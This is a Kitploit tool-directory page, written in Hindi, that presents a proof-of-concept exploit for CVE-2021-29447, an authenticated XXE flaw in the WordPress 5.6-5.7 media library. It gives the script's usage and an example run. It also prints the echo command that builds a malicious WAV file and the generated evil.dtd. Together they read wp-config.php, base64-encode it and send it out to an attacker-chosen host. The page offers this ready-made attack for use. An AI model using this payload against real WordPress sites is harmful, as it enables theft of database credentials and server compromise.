Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447 — CVE-2021-29447 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WordPress 5.6-5.7 मीडिया लाइब्रेरी में प्रमाणित XXE। दुर्भावनापूर्ण WAV फ़ाइल और DTD उत्पन्न करता है ताकि आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन के माध्यम से मनमाने सर्वर फ़ाइलों को पढ़ा जा सके। | Kitploit
उपकरण/GitHubGitHub/g01d3nw01f/cve-2021-29447
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubg01d3nw01f/cve-2021-29447

CVE-2021-29447

CVE-2021-29447 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WordPress 5.6-5.7 मीडिया लाइब्रेरी में प्रमाणित XXE। दुर्भावनापूर्ण WAV फ़ाइल और DTD उत्पन्न करता है ताकि आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन के माध्यम से मनमाने सर्वर फ़ाइलों को पढ़ा जा सके।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-29447 वर्डप्रेस 5.6-5.7 - प्रमाणित (Author+) XXE

https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

उपयोग:

-l LHOST उदाहरण: 127.0.0.1 -n NAME उदाहरण: payload.wav -dn DTD_NAME उदाहरण: evil.dtd -r READ उदाहरण: ../wp-config.php

evil-wav-dtd-xxe.py: error: the following arguments are required: -l/--lhost, -n/--name, -dn/--dtd, -r/--read

स्क्रिप्ट चलाने का उदाहरण:

./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"

root@kitploit:~
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file   --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd(स्वतः जनरेट)

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >
टूल डाउनलोड करें